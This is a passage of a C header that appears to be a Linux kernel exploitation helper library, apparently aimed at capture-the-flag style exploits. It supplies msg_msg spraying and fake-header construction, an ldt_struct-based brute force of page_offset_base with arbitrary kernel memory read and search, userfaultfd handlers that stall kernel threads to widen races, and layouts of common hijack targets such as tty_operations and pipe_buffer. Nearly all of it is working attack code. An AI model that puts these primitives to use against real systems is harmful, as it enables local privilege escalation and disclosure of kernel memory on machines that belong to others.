            return -1;
        }
    }

    return 0;
}

/**
* VI - msg_msg related
*/

/* fallback for headers that do not provide MSG_COPY; used by peek_msg() */
#ifndef MSG_COPY
#define MSG_COPY 040000
#endif

/* message header layout used by build_msg(); pointers are kept as raw 64-bit values */
struct msg_msg {
    struct list_head m_list;    /* list links */
    uint64_t m_type;            /* message type */
    uint64_t m_ts;              /* message text size */
    uint64_t next;              /* raw pointer to the following segment */
    uint64_t security;          /* raw security pointer */
};

/* header of a follow-up message segment: just the raw link to the next one */
struct msg_msgseg {
    uint64_t next;  /* raw pointer to the following segment */
};

/*
struct msgbuf {
long mtype;
char mtext[0];
};
*/

/**
 * @brief create a private message queue with mode 0666
 *
 * @return result of msgget()
 */
int get_msg_queue(void)
{
    const int flags = 0666 | IPC_CREAT;

    return msgget(IPC_PRIVATE, flags);
}

/**
 * @brief receive a message with msgrcv() and no extra flags
 *
 * @param msqid queue id
 * @param msgp destination buffer
 * @param msgsz maximum size of the message text
 * @param msgtyp requested message type
 * @return result of msgrcv()
 */
ssize_t read_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    ssize_t received;

    received = msgrcv(msqid, msgp, msgsz, msgtyp, 0);

    return received;
}

/**
 * @brief stamp the message type into the buffer and send it with msgsnd()
 *
 * `msgp` should point to a `struct msgbuf`, with the data stored in
 * msgbuf.mtext.
 *
 * @param msqid queue id
 * @param msgp message buffer; its mtype field is overwritten with `msgtyp`
 * @param msgsz size of the message text
 * @param msgtyp message type to store
 * @return result of msgsnd()
 */
ssize_t write_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    struct msgbuf *msg = (struct msgbuf*)msgp;

    msg->mtype = msgtyp;

    return msgsnd(msqid, msgp, msgsz, 0);
}

/**
 * @brief receive with MSG_COPY | IPC_NOWAIT | MSG_NOERROR
 *
 * For MSG_COPY, `msgtyp` means to read the no.msgtyp msg_msg on the queue.
 *
 * @param msqid queue id
 * @param msgp destination buffer
 * @param msgsz maximum size of the message text
 * @param msgtyp index of the message on the queue
 * @return result of msgrcv()
 */
ssize_t peek_msg(int msqid, void *msgp, size_t msgsz, long msgtyp)
{
    const int peek_flags = MSG_COPY | IPC_NOWAIT | MSG_NOERROR;

    return msgrcv(msqid, msgp, msgsz, msgtyp, peek_flags);
}

void build_msg(struct msg_msg *msg, uint64_t m_list_next, uint64_t m_list_prev,
uint64_t m_type, uint64_t m_ts, uint64_t next, uint64_t security)
{
msg->m_list.next = m_list_next;
msg->m_list.prev = m_list_prev;
msg->m_type = m_type;
msg->m_ts = m_ts;
msg->next = next;
msg->security = security;
}

/**
* VII - ldt_struct related
*/

/**
 * Sometimes we may want to compile the exp binary with MUSL-GCC, which
 * doesn't ship the `asm/ldt.h` file.
 * As the file is small, it is copied here directly :)
 */

/* Maximum number of LDT entries supported. */
#define LDT_ENTRIES 8192
/* The size of each LDT entry. */
#define LDT_ENTRY_SIZE 8

#ifndef __ASSEMBLY__
/*
 * Descriptor record handed to the modify_ldt syscall.
 *
 * Note on 64bit base and limit is ignored and you cannot set DS/ES/CS
 * not to the default values if you still want to do syscalls. This
 * call is more for 32bit mode therefore.
 */
struct user_desc {
    unsigned int entry_number;
    unsigned int base_addr;
    unsigned int limit;
    /* one-bit and two-bit flags packed into a single unsigned int */
    unsigned int seg_32bit:1;
    unsigned int contents:2;        /* one of MODIFY_LDT_CONTENTS_* */
    unsigned int read_exec_only:1;
    unsigned int limit_in_pages:1;
    unsigned int seg_not_present:1;
    unsigned int useable:1;
#ifdef __x86_64__
    /*
     * Because this bit is not present in 32-bit user code, user
     * programs can pass uninitialized values here. Therefore, in
     * any context in which a user_desc comes from a 32-bit program,
     * the kernel must act as though lm == 0, regardless of the
     * actual value.
     */
    unsigned int lm:1;
#endif
};

/* values for user_desc.contents */
#define MODIFY_LDT_CONTENTS_DATA 0
#define MODIFY_LDT_CONTENTS_STACK 1
#define MODIFY_LDT_CONTENTS_CODE 2

#endif /* !__ASSEMBLY__ */

/*
 * Kernel-specific address: adjust it to match the kernel being targeted.
 * NOTE(review): presumably the address of the kernel's secondary_startup_64
 * symbol - confirm against the target's symbol table.
 */
#define SECONDARY_STARTUP_64 0xffffffff81000060

/**
 * @brief fill a user_desc with the fixed descriptor used by the LDT helpers
 *
 * Sets base_addr to 0xff0000 and entry_number to 0x8000 / 8; limit and every
 * flag bit are cleared.
 *
 * @param desc descriptor to initialise
 */
static inline void init_desc(struct user_desc *desc)
{
    /* init descriptor info */
    desc->base_addr = 0xff0000;
    desc->entry_number = 0x8000 / 8;
    desc->limit = 0;
    desc->seg_32bit = 0;
    desc->contents = 0;
    desc->limit_in_pages = 0;
#ifdef __x86_64__
    /* `lm` is only declared in struct user_desc on x86_64 */
    desc->lm = 0;
#endif
    desc->read_exec_only = 0;
    desc->seg_not_present = 0;
    desc->useable = 0;
}

/**
 * @brief brute-force the page_offset_base by modifying the ldt_struct
 *
 * Starting at 0xffff888000000000, every round lets `ldt_momdifier` install
 * the current guess and then probes it with an 8-byte modify_ldt read. The
 * search stops at the first guess whose read returns a positive value.
 *
 * @param ldt_cracker function to make the ldt_struct modifiable
 * @param cracker_args args of ldt_cracker
 * @param ldt_momdifier function to modify the ldt_struct->entries
 * @param momdifier_args args of ldt_momdifier
 * @param burte_size step added to the guess after each failed probe
 * @return size_t address of page_offset_base; -1 when modify_ldt reports
 *         that no LDT exists, when `burte_size` is 0, or when the guess
 *         would wrap around the 64-bit address space
 */
size_t ldt_guessing_direct_mapping_area(void *(*ldt_cracker)(void*),
                                        void *cracker_args,
                                        void *(*ldt_momdifier)(void*, size_t),
                                        void *momdifier_args,
                                        uint64_t burte_size)
{
    struct user_desc desc;
    uint64_t page_offset_base = 0xffff888000000000;
    uint64_t temp;
    int retval;

    /* init descriptor info */
    init_desc(&desc);

    /* make the ldt_struct modifiable */
    ldt_cracker(cracker_args);
    syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));

    /* leak kernel direct mapping area by modify_ldt() */
    while (1) {
        ldt_momdifier(momdifier_args, page_offset_base);
        retval = syscall(SYS_modify_ldt, 0, &temp, 8);
        if (retval > 0) {
            break;
        }
        else if (retval == 0) {
            printf("[x] no mm->context.ldt!");
            page_offset_base = -1;
            break;
        }

        /* a zero step or a wrapped guess would keep this loop alive forever */
        if (burte_size == 0 || page_offset_base > UINT64_MAX - burte_size) {
            page_offset_base = -1;
            break;
        }
        page_offset_base += burte_size;
    }

    return page_offset_base;
}

/**
 * @brief read the contents of a specific kernel memory area.
 * Note that ldt_guessing_direct_mapping_area() should be called first,
 * and this function should be used in that same caller process.
 *
 * `ldt_momdifier` installs `addr`, then a forked child performs a 0x8000-byte
 * modify_ldt read and ships the bytes back through a pipe. The parent drains
 * the pipe before reaping that child, so a pipe smaller than the payload
 * cannot block both sides.
 *
 * @param ldt_momdifier function to modify the ldt_struct->entries
 * @param momdifier_args args of ldt_momdifier
 * @param addr address of kernel memory to read
 * @param res_buf destination buffer, at least 0x8000 bytes; it may be left
 *                partially filled when pipe(), fork() or the transfer fails
 */
void ldt_arbitrary_read(void *(*ldt_momdifier)(void*, size_t),
                        void *momdifier_args, size_t addr, char *res_buf)
{
    static char buf[0x8000];
    int pipe_fd[2];
    size_t total = 0;
    pid_t pid;

    /* modify the ldt_struct->entries to addr */
    ldt_momdifier(momdifier_args, addr);

    if (pipe(pipe_fd) < 0) {
        perror("[x] pipe");
        return;
    }

    /* read data by the child process */
    pid = fork();
    if (pid < 0) {
        perror("[x] fork");
        close(pipe_fd[0]);
        close(pipe_fd[1]);
        return;
    }

    if (pid == 0) {
        /* child */
        close(pipe_fd[0]);
        syscall(SYS_modify_ldt, 0, buf, 0x8000);
        write(pipe_fd[1], buf, 0x8000);
        exit(0);
    }

    /* parent: drop the write end so EOF is seen if the child dies early */
    close(pipe_fd[1]);

    while (total < 0x8000) {
        ssize_t got = read(pipe_fd[0], res_buf + total, 0x8000 - total);

        if (got <= 0) {
            break;
        }
        total += (size_t) got;
    }

    close(pipe_fd[0]);

    /* reap exactly the reader child, not whichever child exits first */
    waitpid(pid, NULL, 0);
}

/**
 * @brief seek specific content in the memory.
 * Note that ldt_guessing_direct_mapping_area() should be called first,
 * and this function should be used in that same caller process.
 *
 * Walks upwards from `page_offset_base` in 0x8000-byte windows and keeps
 * going until `mem_finder` reports a hit; there is no upper bound on the
 * search.
 *
 * @param ldt_momdifier function to modify the ldt_struct->entries
 * @param momdifier_args args of ldt_momdifier
 * @param page_offset_base the page_offset_base leaked before
 * @param mem_finder your own function to search a 0x8000-byte buf.
 *          It should look like `size_t func(void *args, char *buf)`, where
 *          `buf` holds the data read from the kernel by this function.
 *          Its return value is the offset inside `buf`, `-1` for "not found"
 * @param finder_args args passed to `mem_finder`
 * @return size_t kernel address of the content that was found
 */
size_t ldt_seeking_memory(void *(*ldt_momdifier)(void*, size_t),
                          void *momdifier_args, uint64_t page_offset_base,
                          size_t (*mem_finder)(void*, char *), void *finder_args)
{
    static char buf[0x8000];
    size_t window = page_offset_base;

    for (;; window += 0x8000) {
        size_t hit;

        ldt_arbitrary_read(ldt_momdifier, momdifier_args, window, buf);

        hit = mem_finder(finder_args, buf);
        if (hit != (size_t) -1) {
            return window + hit;
        }
    }
}

/**
* VIII - userfaultfd related code
*/

/**
 * MUSL does not ship `userfaultfd.h` either :(
 * Luckily only a handful of macros are needed for exploitation,
 * so they are simply defined here directly :)
 */

/* API version stored in uffdio_api.api by register_userfaultfd() */
#define UFFD_API ((uint64_t)0xAA)
/* per-request numbers fed into _IOWR() below */
#define _UFFDIO_REGISTER (0x00)
#define _UFFDIO_COPY (0x03)
#define _UFFDIO_API (0x3F)

/* userfaultfd ioctl ids, built from the type byte UFFDIO and the numbers above */
#define UFFDIO 0xAA
#define UFFDIO_API _IOWR(UFFDIO, _UFFDIO_API, \
struct uffdio_api)
#define UFFDIO_REGISTER _IOWR(UFFDIO, _UFFDIO_REGISTER, \
struct uffdio_register)
#define UFFDIO_COPY _IOWR(UFFDIO, _UFFDIO_COPY, \
struct uffdio_copy)

/* record obtained by read() on a userfaultfd; `event` selects the `arg` member */
struct uffd_msg {
    uint8_t event;

    uint8_t reserved1;
    uint16_t reserved2;
    uint32_t reserved3;

    union {
        /* page-fault details */
        struct {
            uint64_t flags;
            uint64_t address;
            union {
                uint32_t ptid;
            } feat;
        } pagefault;

        struct {
            uint32_t ufd;
        } fork;

        struct {
            uint64_t from;
            uint64_t to;
            uint64_t len;
        } remap;

        struct {
            uint64_t start;
            uint64_t end;
        } remove;

        struct {
            /* unused reserved fields */
            uint64_t reserved1;
            uint64_t reserved2;
            uint64_t reserved3;
        } reserved;
    } arg;
} __attribute__((packed));

/* value of uffd_msg.event checked by the fault handler */
#define UFFD_EVENT_PAGEFAULT 0x12

/* argument of the UFFDIO_API ioctl */
struct uffdio_api {
    uint64_t api;       /* set to UFFD_API by register_userfaultfd() */
    uint64_t features;  /* set to 0 by register_userfaultfd() */
    uint64_t ioctls;
};

/* address range: start address plus length */
struct uffdio_range {
    uint64_t start;
    uint64_t len;
};

/* argument of the UFFDIO_REGISTER ioctl */
struct uffdio_register {
    struct uffdio_range range;  /* region to register */
    /* bits for `mode` */
#define UFFDIO_REGISTER_MODE_MISSING ((uint64_t)1<<0)
#define UFFDIO_REGISTER_MODE_WP ((uint64_t)1<<1)
    uint64_t mode;
    uint64_t ioctls;
};


/* argument of the UFFDIO_COPY ioctl */
struct uffdio_copy {
    uint64_t dst;   /* destination address */
    uint64_t src;   /* source address */
    uint64_t len;   /* number of bytes */
    /* bit for `mode` */
#define UFFDIO_COPY_MODE_DONTWAKE ((uint64_t)1<<0)
    uint64_t mode;
    int64_t copy;
};

//#include <linux/userfaultfd.h>

/* 0x1000-byte source page used by uffd_handler_for_stucking_thread() for UFFDIO_COPY */
char temp_page_for_stuck[0x1000];

void register_userfaultfd(pthread_t *monitor_thread, void *addr,
unsigned long len, void *(*handler)(void*))
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
int s;

/* Create and enable userfaultfd object */
uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
if (uffd == -1) {
err_exit("userfaultfd");
}

uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) == -1) {
err_exit("ioctl-UFFDIO_API");
}

uffdio_register.range.start = (unsigned long) addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) {
err_exit("ioctl-UFFDIO_REGISTER");
}

s = pthread_create(monitor_thread, NULL, handler, (void *) uffd);
if (s != 0) {
err_exit("pthread_create");
}
}

void *uffd_handler_for_stucking_thread(void *args)
{
struct uffd_msg msg;
int fault_cnt = 0;
long uffd;

struct uffdio_copy uffdio_copy;
ssize_t nread;

uffd = (long) args;

for (;;) {
struct pollfd pollfd;
int nready;
pollfd.fd = uffd;
pollfd.events = POLLIN;
nready = poll(&pollfd, 1, -1);

if (nready == -1) {
err_exit("poll");
}

nread = read(uffd, &msg, sizeof(msg));

/* just stuck there is okay... */
sleep(100000000);

if (nread == 0) {
err_exit("EOF on userfaultfd!\n");
}

if (nread == -1) {
err_exit("read");
}

if (msg.event != UFFD_EVENT_PAGEFAULT) {
err_exit("Unexpected event on userfaultfd\n");
}

uffdio_copy.src = (unsigned long long) temp_page_for_stuck;
uffdio_copy.dst = (unsigned long long) msg.arg.pagefault.address &
~(0x1000 - 1);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) {
err_exit("ioctl-UFFDIO_COPY");
}

return NULL;
}
}

/**
 * @brief register a range whose page faults are served by
 *        uffd_handler_for_stucking_thread()
 *
 * @param monitor_thread receives the id of the handler thread
 * @param buf start of the range to register
 * @param len length of the range in bytes
 */
void register_userfaultfd_for_thread_stucking(pthread_t *monitor_thread,
                                              void *buf, unsigned long len)
{
    void *(*stuck_handler)(void*) = uffd_handler_for_stucking_thread;

    register_userfaultfd(monitor_thread, buf, len, stuck_handler);
}


/**
 * IX - kernel structures
 *
 * The types below are only forward-declared: the structures that follow
 * refer to them through pointers and never need their layout.
 */

struct file;
struct file_operations;
struct tty_struct;
struct tty_driver;
struct serial_icounter_struct;
struct ktermios;
struct termiox;
struct seq_operations;

/* layout of a seq_file object; the lock is kept as four opaque 64-bit words */
struct seq_file {
    char *buf;
    size_t size;
    size_t from;
    size_t count;
    size_t pad_until;
    loff_t index;
    loff_t read_pos;
    uint64_t lock[4];                   /* struct mutex lock; */
    const struct seq_operations *op;    /* operation table */
    int poll_event;
    const struct file *file;
    void *private;
};

/* operation table referenced by seq_file.op: four function pointers */
struct seq_operations {
    void * (*start) (struct seq_file *m, loff_t *pos);
    void (*stop) (struct seq_file *m, void *v);
    void * (*next) (struct seq_file *m, void *v, loff_t *pos);
    int (*show) (struct seq_file *m, void *v);
};

/*
 * Operation table of a tty: a sequence of function pointers followed by the
 * proc_fops pointer. The three poll_* hooks are only present when
 * CONFIG_CONSOLE_POLL is defined.
 */
struct tty_operations {
    struct tty_struct * (*lookup)(struct tty_driver *driver,
                                  struct file *filp, int idx);
    int (*install)(struct tty_driver *driver, struct tty_struct *tty);
    void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
    int (*open)(struct tty_struct * tty, struct file * filp);
    void (*close)(struct tty_struct * tty, struct file * filp);
    void (*shutdown)(struct tty_struct *tty);
    void (*cleanup)(struct tty_struct *tty);
    int (*write)(struct tty_struct * tty,
                 const unsigned char *buf, int count);
    int (*put_char)(struct tty_struct *tty, unsigned char ch);
    void (*flush_chars)(struct tty_struct *tty);
    int (*write_room)(struct tty_struct *tty);
    int (*chars_in_buffer)(struct tty_struct *tty);
    int (*ioctl)(struct tty_struct *tty,
                 unsigned int cmd, unsigned long arg);
    long (*compat_ioctl)(struct tty_struct *tty,
                         unsigned int cmd, unsigned long arg);
    void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
    void (*throttle)(struct tty_struct * tty);
    void (*unthrottle)(struct tty_struct * tty);
    void (*stop)(struct tty_struct *tty);
    void (*start)(struct tty_struct *tty);
    void (*hangup)(struct tty_struct *tty);
    int (*break_ctl)(struct tty_struct *tty, int state);
    void (*flush_buffer)(struct tty_struct *tty);
    void (*set_ldisc)(struct tty_struct *tty);
    void (*wait_until_sent)(struct tty_struct *tty, int timeout);
    void (*send_xchar)(struct tty_struct *tty, char ch);
    int (*tiocmget)(struct tty_struct *tty);
    int (*tiocmset)(struct tty_struct *tty,
                    unsigned int set, unsigned int clear);
    int (*resize)(struct tty_struct *tty, struct winsize *ws);
    int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
    int (*get_icount)(struct tty_struct *tty,
                      struct serial_icounter_struct *icount);
    void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
    int (*poll_init)(struct tty_driver *driver, int line, char *options);
    int (*poll_get_char)(struct tty_driver *driver, int line);
    void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
    const struct file_operations *proc_fops;
};

/* only referenced through pointers below */
struct page;
struct pipe_inode_info;
struct pipe_buf_operations;

/*
 * Layout of one pipe buffer slot.
 * Original author's note: read start from len to offset, write start from
 * offset.
 */
struct pipe_buffer {
    struct page *page;
    unsigned int offset;
    unsigned int len;
    const struct pipe_buf_operations *ops;  /* operation table */
    unsigned int flags;
    unsigned long private;
};

/* operation table referenced by pipe_buffer.ops: four function pointers */
struct pipe_buf_operations {
    /*
     * ->confirm() verifies that the data in the pipe buffer is there
     * and that the contents are good. If the pages in the pipe belong
     * to a file system, we may need to wait for IO completion in this
     * hook. Returns 0 for good, or a negative error value in case of
     * error. If not present all pages are considered good.
     */
    int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);

    /*
     * When the contents of this pipe buffer has been completely
     * consumed by a reader, ->release() is called.
     */
    void (*release)(struct pipe_inode_info *, struct pipe_buffer *);

    /*
     * Attempt to take ownership of the pipe buffer and its contents.
     * ->try_steal() returns %true for success, in which case the contents
     * of the pipe (the buf->page) is locked and now completely owned by the
     * caller. The page may then be transferred to a different mapping, the
     * most often used case is insertion into different file address space
     * cache.
     */
    int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);

    /*
     * Get a reference to the pipe buffer.
     */
    int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};

#endif